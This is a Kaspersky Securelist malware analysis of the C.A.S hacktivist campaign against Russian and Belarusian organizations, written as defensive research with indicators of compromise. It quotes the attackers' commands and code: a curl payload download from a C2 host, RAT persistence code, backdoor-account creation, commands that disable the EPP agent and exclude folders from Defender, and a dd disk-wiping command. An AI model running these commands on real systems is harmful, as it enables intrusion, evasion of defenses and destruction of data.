Analysis of Cyber Anarchy Squad attacks targeting Russian and Belarusian organizations

securelist.com · Kaspersky · 1 year ago · news
quality 7/10 · good
0 net
Tags
cyber-attacks security-groups cyber-anarchy-squad
C.A.S hacktivists attack Russian organizations using rare RATs | Securelist Subscribe --> Dark mode off Login --> Securelist menu English Russian Spanish Brazil Existing Customers Personal My Kaspersky Renew your product Update your product Customer support Business KSOS portal Kaspersky Business Hub Technical Support Knowledge Base Renew License Home Products Trials&Update Resource Center Business Kaspersky Next Small Business (1-50 employees) Medium Business (51-999 employees) Enterprise (1000+ employees) Securelist Threats Financial threats Mobile threats Web threats Secure environment (IoT) Vulnerabilities and exploits Spam and Phishing Industrial threats Categories APT reports Incidents Research Malware reports Spam and phishing reports Publications Kaspersky Security Bulletin Archive All Tags APT Logbook Webinars Statistics Encyclopedia Threats descriptions KSB 2021 About Us Company Transparency Corporate News Press Center Careers Sponsorships Policy Blog Contacts Partners Find a Partner Partner Program Content menu Close Subscribe Table of Contents About C.A.S Tactics Initial Access Execution Persistence Defense Evasion Credential Access Discovery Command and Control Revenge RAT Spark RAT Meterpreter Impact Victims Connections to other groups Takeaways Indicators of compromise Authors Kaspersky About C.A.S C.A.S (Cyber Anarchy Squad) is a hacktivist group that has been attacking organizations in Russia and Belarus since 2022. Besides data theft, its goal is to inflict maximum damage, including reputational. To this end, the group’s attacks exploit vulnerabilities in publicly available services and make extensive use of free tools. Our latest investigation unearthed new activity by the group, explored the attack stages, and analyzed the tools and malware used. In addition, we discovered links between C.A.S and other hacktivist groups, such as the Ukrainian Cyber Alliance and DARKSTAR. Like most hacktivist groups, C.A.S uses Telegram as a platform to spread information about victims. We found a channel that posts news and messages about the group’s attacks and ideology, as well as a chat hosting a discussion of its activities. C.A.S on Telegram Note: this post examines active Telegram channels that we presume to be run by hacktivist groups. Use these sources with caution. Tactics This section analyzes the attack chain as per the MITRE ATT&CK framework, as well as the tools we found in the current C.A.S campaign. Initial Access C.A.S gains initial access to targeted systems by means of the Exploit Public-Facing Application technique ( T1190 ). The attackers compromise Jira, Confluence and Microsoft SQL Server services using vulnerabilities that we were unable to identify due to the data storage limitations of the attacked segment. However, our analysis of the group leader’s messages in the C.A.S Telegram channel suggests that the hacktivists do not use phishing emails as an initial attack vector. Instead, they likely attack vulnerable network resources or gain access to systems after their compromise by third parties. Messages from the C.A.S leader known as The Way Translation: But I need them to let us into the network mole/fishers The aim of the C.A.S group is to inflict maximum financial and reputational damage on organizations in Russia and Belarus. In pursuit of this goal, they likely exploit vulnerabilities not only in Jira, Confluence and MS SQL, but in other publicly available services and systems too. What’s more, we are aware of attacks carried out by C.A.S in collaboration with other groups, which is another way they gain initial access and move through victims’ infrastructure. Message about the group’s methods of gaining initial access Translation: but our method is to technically break through the outer perimeter, and those organizations that we need here and now often prefer to maintain 1 site, 2–3 reliable services and not poke around the network once again. so you set yourself the task to hack the company N. naturally, this is done through phishing, but unfortunately, we simply don’t have any fishers in our squad, and our arsenal is not designed for beacon flooding, but for exploits Execution To move further through the infrastructure, the threat actors used rare open-source remote access Trojans (RATs), including Revenge RAT and Spark RAT, which we have not seen in attacks by other hacktivists. These utilities allowed them to remotely control the infected systems and execute various commands. In one incident, we detected the use of a compromised MS SQL service to execute commands in cmd. This was indicated by the cmd.exe process running as a child process of sqlservr.exe. The attackers also used PowerShell to execute scripts: powershell.exe -ex bypass -f \\[DOMAIN]\netlogon\rm.ps1 1 powershell . exe - ex bypass - f \ \ [ DOMAIN ] \ netlogon \ rm . ps1 On top of this, the attackers downloaded the Meterpreter reverse shell for the Metasploit framework from the C2 server to the infected host using the cURL tool: "$system32\cmd.exe",""$system32\cmd.exe" /c cd %appdata% && dir && curl -O hxxp://185.117.75[.]3:8092/sdc.exe 1 2 "$system32\cmd.exe" , "" $ system32 \ cmd . exe " / c cd % appdata % && dir && curl - O hxxp : //185.117.75[.]3:8092/sdc.exe In some reverse shell incidents, we also found traces of Revenge RAT ( 48210CA2408DC76815AD1B7C01C1A21A ) being run through the PowerShell process: powershell.exe -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::LoadFile('C:\Users\\Downloads\ .exe').EntryPoint.Invoke($null, @()) 1 2 3 powershell . exe - WindowStyle Hidden - NoExit - Command [ System . Reflection . Assembly ] :: LoadFile ( 'C:\Users\\Downloads\ .exe' ) . EntryPoint . Invoke ( $ null , @ ( ) ) Persistence To gain persistence in the system, the threat actors created accounts on compromised hosts using the net.exe utility: C:\Windows\system32\cmd.exe" /c net user admin cas /add C:\Windows\system32\cmd.exe" /c net user admin admin123123123 /add 1 2 C : \ Windows \ system32 \ cmd . exe " /c net user admin cas /add C:\Windows\system32\cmd.exe" / c net user admin admin123123123 / add It’s worth noting that they used the password cas for the admin account, matching the name of the group. We also found samples of Revenge RAT that had gained persistence in the system by adding registry keys to HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. try { RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true); try { if (!((string)((registryKey != null) ? registryKey.GetValue("\"" + Path.GetFileNameWithoutExtension(Program._installName) + "\"") : null) == text) && registryKey != null) { registryKey.SetValue(fileNameWithoutExtension, "\"" + text + "\""); } } catch { if (registryKey != null) { registryKey.SetValue(fileNameWithoutExtension, "\"" + text + "\""); } } if (registryKey != null) { registryKey.Dispose(); } } internal static string _installName = "rpchost.exe"; 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 try { RegistryKey registryKey = Registry . LocalMachine . OpenSubKey ( "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" , true ) ; try { if ( ! ( ( string ) ( ( registryKey != null ) ? registryKey . GetValue ( "\"" + Path . GetFileNameWithoutExtension ( Program . _installName ) + "\"" ) : null ) == text ) && registryKey != null ) { registryKey . SetValue ( fileNameWithoutExtension , "\"" + text + "\"" ) ; } } catch { if ( registryKey != null ) { registryKey . SetValue ( fileNameWithoutExtension , "\"" + text + "\"" ) ; } } if ( registryKey != null ) { registryKey . Dispose ( ) ; } } internal static string _installName = "rpchost.exe" ; These Trojan samples were additionally copied to the Startup folder: File.Copy(Application.ExecutablePath, "C:\\Users\\" + Environment.UserName + "\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" + Program._installName); internal static string _ip = "194.36.188.94"; internal static string _installName = "svhost.exe"; 1 2 3 4 5 6 7 File . Copy ( Application . ExecutablePath , "C:\\Users\\" + Environment . UserName + "\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" + Program . _installName ) ; internal static string _ip = "194.36.188.94" ; internal static string _installName = "svhost.exe" ; During execution, one of the above RAT samples ( FC3A8EABD07A221B478A4DDD77DDCE43 ) created a watchdog timer file called svxhost.exe in the C:\Windows\System32 directory, wrote information to this file, created the NgcMngrSvc service with svxhost.exe as an executable file, and ran this service. [HandleProcessCorruptedStateExceptions] private static void CreateWatchdog() { Program.hService = Helper.OpenService(Program.hSCM, "NgcMngrSvc", 4); if (Program.hService == IntPtr.Zero) { try { File.WriteAllBytes(Program.system + "svxhost.exe", Program.GetResource("dog")); } catch { } Program.hService = Helper.CreateService(Program.hSCM, "NgcMngrSvc", "Microsoft Passport Manager", 983551, 16, 2, 0, Program.system + "svxhost.exe", null, IntPtr.Zero, null, null, null); } Helper.StartService(Program.hService, 0, null); } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 [ HandleProcessCorruptedStateExceptions ] private static void CreateWatchdog ( ) { Program . hService = Helper . OpenService ( Program . hSCM , "NgcMngrSvc" , 4 ) ; if ( Program . hService == IntPtr . Zero ) { try { File . WriteAllBytes ( Program . system + "svxhost.exe" , Program . GetResource ( "dog" ) ) ; } catch { } Program . hService = Helper . CreateService ( Program . hSCM , "NgcMngrSvc" , "Microsoft Passport Manager" , 983551 , 16 , 2 , 0 , Program . system + "svxhost.exe" , null , IntPtr . Zero , null , null , null ) ; } Helper . StartService ( Program . hService , 0 , null ) ; } Defense Evasion During our incident investigations, we often noted that the attackers gained full control over information security tools because these were not properly configured. To implement effective anti-attack measures, it is vital to perform regular testing, updating and integration of security systems. A key factor in securing infrastructure is compliance with password-protection policies for access to the information security systems. In one of the incidents, C.A.S managed to disable an EPP agent without a password, using the rm.ps1 script. $guidQuery = wmic product where "[redacted]" get IdentifyingNumber $guid = $guidQuery | Select-String -Pattern "{[A-F0-9-]+}" | ForEach-Object { $_.Matches[0].Value } if ($guid -ne $null) { $msiexecCommand2 = "msiexec.exe /x $guid /quiet" Start-Process -NoNewWindow -FilePath cmd -ArgumentList "/c $msiexecCommand2" } 1 2 3 4 5 6 7 8 $ guidQuery = wmic product where "[redacted]" get IdentifyingNumber $ guid = $ guidQuery | Select - String - Pattern "{[A-F0-9-]+}" | ForEach - Object { $ _ . Matches [ 0 ] . Value } if ( $ guid - ne $ null ) { $ msiexecCommand2 = "msiexec.exe /x $guid /quiet" Start - Process - NoNewWindow - FilePath cmd - ArgumentList "/c $msiexecCommand2" } The final command to disable the EPP agent was this: cmd.exe /c msiexec.exe /x {GUID} /quiet 1 cmd . exe / c msiexec . exe / x { GUID } / quiet Also, as part of the Defense Evasion technique, the attackers use Revenge RAT to add the $windir\$system32 directory to the Windows Defender exclusion list. This allows the group to hide its activity, because the RAT itself and its malicious payload are both installed in this folder. "\"$windir\\$system32\\WindowsPowerShell\\v1.0\\powershell.exe\" -WindowStyle Hidden - Command \"Add-MpPreference -ExclusionPath '$windir\\$system32'\"" 1 2 "\"$windir\\$system32\\WindowsPowerShell\\v1.0\\powershell.exe\" -WindowStyle Hidden - Command \"Add-MpPreference -ExclusionPath '$windir\\$system32'\"" And to further reduce the likelihood of detection, the attackers use a malware naming convention that mimics legitimate Windows processes: C:\Windows\System32\svxhost.exe C:\Windows\System32\svrhost.exe C:\Windows\System32\drivers\etc\rpchost.exe C:\Windows\panther\ssbyt.exe 1 2 3 4 C:\Windows\System32\svxhost.exe C:\Windows\System32\svrhost.exe C:\Windows\System32\drivers\etc\rpchost.exe C:\Windows\panther\ssbyt.exe Credential Access In our study of hacktivist groups ( Twelve , BlackJack , Head Mare , Crypt Ghouls and others), we often encountered the use of the same credential extraction tools, namely XenAllPasswordPro, BrowserThief and Mimikatz. These tools have long been known in the community and regularly feature in our crimeware reports . XenAllPasswordPro extracts passwords from system storages. BrowserThief compromises browser data, including autofill data and saved accounts. Mimikatz extracts password hashes from Windows RAM. C.A.S is no exception: we found these tools in their attacks as well. This is yet further proof that hacktivist groups attacking Russia and Belarus tend to deploy the same arsenal of publicly available utilities. Discovery At the infrastructure exploration stage, the attackers made active use of various commands to collect information. Here’s a list of the commands we logged: Command Description net user Lists all local user accounts (using net.exe) systeminfo Displays detailed system information, including operating system version, installation date and patch date, as well as computer model, CPU and memory settings cmd ver Displays the operating system version net localgroup Displays a list of all local groups on the computer (using net.exe) net accounts Displays user account settings, such as password expiration period, minimum password length and account lockout conditions (using net.exe) net user /domain Displays a list of user accounts in the domain (using net.exe) cd %appdata% && whoami Navigates to the %appdata% folder, then displays the name of the user executing this command The Revenge RAT samples also ran WMI queries to collect information about the operating system and CPU to be sent to the attackers’ command-and-control (C2) server: SELECT * FROM Win32_OperatingSystem SELECT UserName FROM Win32_ComputerSystem SELECT * FROM WIN32_Processor 1 2 3 SELECT * FROM Win32_OperatingSystem SELECT UserName FROM Win32_ComputerSystem SELECT * FROM WIN32_Processor Command and Control To communicate with the C2 server, C.A.S uses various tools. We saw the use of reverse shells generated by the msfvenom tool for the Metasploit framework, as well as publicly available RATs. Revenge RAT The attackers first used Revenge RAT to establish a connection to the C2 server, then downloaded and installed the necessary payloads of various frameworks; they also collected data about the infected host and sent it to the server. We found two similar customized samples of Revenge RAT in the attacks we investigated. Below is a full list of functions found in these variants: FC3A8EABD07A221B478A4DDD77DDCE43 48210CA2408DC76815AD1B7C01C1A21A FilesInFolder FilesInFolder Drives Drives CreateFile CreateFile DeleteFile DeleteFile MoveFile MoveFile CopyFile CopyFile ArchiveFile ArchiveFile UploadFile UploadFile DownloadFile DownloadFile ShellCommand ShellCommand Uninstall Uninstall ClientModel DisconnectMsg Ping Text The configuration files for these samples are also similar: FC3A8EABD07A221B478A4DDD77DDCE43 48210CA2408DC76815AD1B7C01C1A21A internal static string _ip = "194.36.188.94"; internal static string _installName = "rpchost.exe"; private static int _port = 1337; internal static bool _install = true; internal static string _group = "cci.by2"; internal static string _startupMethod = "hklm"; internal static string _installLocation = "windir\\System32\\drivers\\etc\\"; internal static bool _installWatchdog = true; internal static bool _usePowershell = false; private static Client _client; internal static Process cmd; private static IntPtr hSCM; internal static IntPtr hService; private static string system = Environment.GetFolderPath(Environment.SpecialFolder.System) + "\\"; 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 internal static string _ip = "194.36.188.94"; internal static string _installName = "rpchost.exe"; private static int _port = 1337; internal static bool _install = true; internal static string _group = "cci.by2"; internal static string _startupMethod = "hklm"; internal static string _installLocation = "windir\\System32\\drivers\\etc\\"; internal static bool _installWatchdog = true; internal static bool _usePowershell = false; private static Client _client; internal static Process cmd; private static IntPtr hSCM; internal static IntPtr hService; private static string system = Environment.GetFolderPath(Environment.SpecialFolder.System) + "\\"; internal static string _ip = "194.36.188.94"; internal static string _installName = "sysinfo"; private static int _port = 1337; internal static bool _install = true; private static Client _tcpClient; internal static Process cmd; 1 2 3 4 5 6 7 8 9 10 11 internal static string _ip = "194.36.188.94"; internal static string _installName = "sysinfo"; private static int _port = 1337; internal static bool _install = true; private static Client _tcpClient; internal static Process cmd; Spark RAT As mentioned above, the group used another remote access Trojan called Spark RAT. Below is its configuration: { "secure":false, "host":"185.117.75.3", "port":9610, "path":"/", "uuid":"3917b41****", "key":"aa494c90****" } 1 2 3 4 5 6 7 8 { "secure" : false , "host" : "185.117.75.3" , "port" : 9610 , "path" : "/" , "uuid" : "3917b41****" , "key" : "aa494c90****" } From the IP address specified in the configuration, the attackers downloaded the Meterpreter payload to the victim’s device. Alongside this, Spark RAT automatically collects and sends the following system information to the C2 server: Trojan function Description id Unique device identifier runtime.GOOS Information about the operating system in which the RAT is running runtime.GOARCH CPU architecture localIP Local IP address of the device macAddr MAC address of the network interface of the device cpuInfo CPU information ramInfo Amount of RAM netInfo General information about network connections diskInfo Information about disk drives uptime System uptime since the last boot hostname Device name username Name of the current user Spark RAT provides the operator with a wide range of commands to control the target device. These commands allow both basic operations (such as PING to check client availability, SHUTDOWN to turn off the device, and RESTART to reboot it) as well as more complex ones, such as remote file management (FILES_LIST, FILES_FETCH, FILES_UPLOAD), terminal interaction (TERMINAL_INIT, TERMINAL_INPUT, TERMINAL_RESIZE) and remote desktop access (DESKTOP_INIT, DESKTOP_SHOT). Also available to the operator are commands to manage processes (PROCESSES_LIST, PROCESS_KILL) and execute system commands (COMMAND_EXEC). Meterpreter In one of the incidents, we found a Meterpreter reverse shell ( 6CBC93B041165D59EA5DED0C5F377171 ). Using this, the group was able to gain full access to the compromised system and do the following: Remotely manage the file system; Intercept network traffic; Log keystrokes; Extract password hashes; Perform pivoting techniques through compromised hosts; Monitor the webcam and microphone. The reverse shell contains the following C2 server address and port: 185.117.75[.]35:4444 1 185.117.75 [ . ] 35 : 4444 Impact To cause damage to victims, the group encrypts their infrastructure. As we’ve noted before in similar hacktivist attacks, the threat actors’ arsenal consists of leaked LockBit ransomware builders for Windows systems and Babuk for Linux systems. In the majority of C.A.S attacks, encrypted file extensions are generated randomly; but sometimes the number 3119 appears both in the name of the executable file of the ransomware Trojan, and in the extensions added to encrypted files. This number often crops up in C.A.S activity — we see it in usernames, ransom notes, encrypted file extensions and group-related merchandise. It is not a random sequence of digits, but represents the positions of the letters C, A, and S in the alphabet: C is 3, A is 1 and S is 19. One of the group’s ransomware samples is named 3119.exe. In our investigation of a C.A.S attack involving this sample, we found a ransom note displayed after file encryption in the system: C.A.S ransom note Besides encryption, the attackers can destroy data in different segments of the victim’s network or on specific servers. To do this, they first collect information about attached drives using the df system utility: df -h 1 df - h Then, to destroy the data, they use the dd system utility, which executes /dev/zero — a file that generates an endless stream of null bytes. The attackers copy null bytes from /dev/zero to the /dev/[VOLUME] partition of their choice in 4 MB blocks. This overwrites the data in the partition with zeros, wiping it forever. dd if=/dev/zero of=/dev/[VOLUME] bs=4M 1 dd if = / dev / zero of = / dev / [ VOLUME ] bs = 4M This operation allows the attackers to irreversibly destroy data on the victim’s servers. On Telegram, the perpetrators often confirm their destructive impact on victims’ infrastructure. In their posts, they describe what they did and attach screenshots with the results of their operations. Which part of the infrastructure to encrypt and which to destroy immediately is the attackers’ choice: it depends on the situation. Public chat message from C.A.S Translation: Context: these servers have been down for 3 days, one was erased (namely the volumes with data), the second was encrypted (only the directories with data). Today they were wiped to the root. Victims C.A.S targets companies from Russia and Belarus in various industries, including government and commercial organizations, entertainment and technology firms, telecommunications companies and industrial enterprises. This suggests that victims are chosen based on their location, regardless of their field of activity. The group often writes about its victims on Telegram, posting screenshots of infrastructure, stolen documents and links to cloud storages or forums offering stolen data for download. Connections to other groups As mentioned above, besides its Telegram channel, C.A.S hosts a public chat where group members and followers actively communicate. Interestingly, the chat administrators belong not only to C.A.S, but to related groups; one of them, who goes by the name of Sean Townsend, is an administrator of the hacktivist group RUH8 and the press secretary of the Ukrainian Cyber Alliance (U.C.A). C.A.S Discussions chat administrators and the Telegram account of the C.A.S leader The Way In its Telegram channel, C.A.S states that it sometimes works with other groups that share its mission to attack organizations from Russia and Belarus. For example, we found posts about joint attacks by C.A.S with U.C.A, RUH8, RM-RF and others: Message about a joint attack by C.A.S and U.C.A Message about a joint attack by C.A.S, RUH8 and RM-RF Translation: Thanks to colleagues who helped with the last attack While investigating an incident in the infrastructure of one C.A.S victim, we also found traces of compromise pointing to the DARKSTAR group (also known by the names Shadow and Comet). In one incident, we discovered the following files: DARKSTAR C.A.S A file named ServiceAD and Highimage ( A2D098F44ABA4967826C3002541E3BB8 ) that runs as a service (e.g. with the SC CREATE and SC START commands) to execute malicious files downloaded in DARKSTAR attacks Spark RAT – ovpmhnjotowtj.exe ( BCEC17275114C6A87D8B7110AECEC5CC ) with C2 address 185.117.75[.]3 A loader ( 7E101596EEB43ED2DE78BB45D7031F7B ) used in multiple DARKSTAR attacks that accesses the domain itsfreerepublic[.]com to download encrypted shellcode and transfer control Revenge RAT – sysinfo.exe ( 48210CA2408DC76815AD1B7C01C1A21A ) and ssbyt.exe ( 23B873BB66DC09E91127E20825B6CBC7 ) with C2 address 194.36.188[.]94 These findings are further evidence of a connection between groups targeting Russian organizations . As part of their collaboration, group members likely share access to victims’ infrastructure, C2 infrastructure and tools. They also exchange information about attacks on Telegram as a way to increase campaign visibility, discredit victims and inflict reputational damage. Takeaways The C.A.S group poses a serious threat to organizations in Russia and Belarus. The threat actors attack key industries using an array of tools and techniques that we have observed in the campaigns of other hacktivist groups. C.A.S attacks utilize rare RATs, publicly available remote management tools, and a range of vulnerability exploitation methods. In addition, the group spreads information about its attacks through a public Telegram channel, which causes both financial and reputational damage to victims. A more detailed analysis of C.A.S attacks is available to our Threat Intelligence subscribers . The group openly confirms that it actively collaborates with other attackers targeting Russia. Joint actions and use of a common infrastructure point to the emergence of a sophisticated attack ecosystem, in which hacktivist groups share resources, tools and access to improve efficiency and scale operations. This strategy not only complicates attribution, but significantly increases the destructive potential of attacks. To effectively counter such groups, it is vital to harden system defenses, apply regular updates to cybersecurity tools and leverage data analytics for monitoring relevant threat activity. It is also critically important to follow best practices when configuring your information security systems. We strongly recommend the following guides: Configuring protection for managed applications ; Hardening Guide . Following these instructions will minimize the risks of compromise and increase your system’s resistance to possible attacks. Indicators of compromise Revenge RAT FC3A8EABD07A221B478A4DDD77DDCE43 rpchost.exe 48210CA2408DC76815AD1B7C01C1A21A sysinfo.exe 8C70377554B291D4A231CF113398C00D svhost.exe, svxhost.exe 23B873BB66DC09E91127E20825B6CBC7 ssbyt.exe, sysinfo.exe Spark RAT BCEC17275114C6A87D8B7110AECEC5CC ovpmhnjotowtj.exe Meterpreter 6CBC93B041165D59EA5DED0C5F377171 sdc.exe 1FCD4F83BF6414D79D5F29AD1E795B3D svrhost.exe File path C:\windows\System32\svxhost.exe C:\Windows\system32\svrhost.exe C:\Windows\System32\drivers\etc\rpchost.exe C:\Windows\panther\ssbyt.exe C:\Users\[USERNAME]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.exe IPs 194.36.188[.]94 185.117.75[.]3 Metasploit C.A.S Meterpreter Babuk Mitre ATT&CK LockBit Telegram hacktivists Malware Technologies PowerShell Encryption RAT Trojan Malware Malware Descriptions Ransomware Analysis of Cyber Anarchy Squad attacks targeting Russian and Belarusian organizations Your email address will not be published. Required fields are marked * Name * Email * Cancel Δ This site uses Akismet to reduce spam. Learn how your comment data is processed. Table of Contents About C.A.S Tactics Initial Access Execution Persistence Defense Evasion Credential Access Discovery Command and Control Revenge RAT Spark RAT Meterpreter Impact Victims Connections to other groups Takeaways Indicators of compromise From the same authors In the same category Latest Posts Latest Webinars Reports Kaspersky researchers analyze updated CoolClient backdoor and new tools and scripts used in HoneyMyte (aka Mustang Panda or Bronze President) APT campaigns, including three variants of a browser data stealer. Kaspersky discloses a 2025 HoneyMyte (aka Mustang Panda or Bronze President) APT campaign, which uses a kernel-mode rootkit to deliver and protect a ToneShell backdoor. Kaspersky GReAT experts analyze the Evasive Panda APT’s infection chain, including shellcode encrypted with DPAPI and RC5, as well as the MgBot implant. Kaspersky expert describes new malicious tools employed by the Cloud Atlas APT, including implants of their signature backdoors VBShower, VBCloud, PowerShower, and CloudAtlas. Subscribe to our weekly e-mails The hottest research right in your inbox Email (Required) (Required) I agree to provide my email address to “AO Kaspersky Lab” to receive information about new posts on the site. I understand that I can withdraw this consent at any time via e-mail by clicking the “unsubscribe” link that I find at the bottom of any e-mail sent to me for the purposes mentioned above. Subscribe Δ Threats Threats APT (Targeted attacks) Secure environment (IoT) Mobile threats Financial threats Spam and phishing Industrial threats Web threats Vulnerabilities and exploits All threats Categories Categories APT reports Malware descriptions Security Bulletin Malware reports Spam and phishing reports Security technologies Research Publications All categories Other sections Archive All tags Webinars APT Logbook Statistics Encyclopedia Threats descriptions KSB 2025 Kaspersky ICS CERT © 2026 AO Kaspersky Lab. All Rights Reserved. Registered trademarks and service marks are the property of their respective owners. Privacy Policy Terms of use License Agreement Cookies
← Back to stories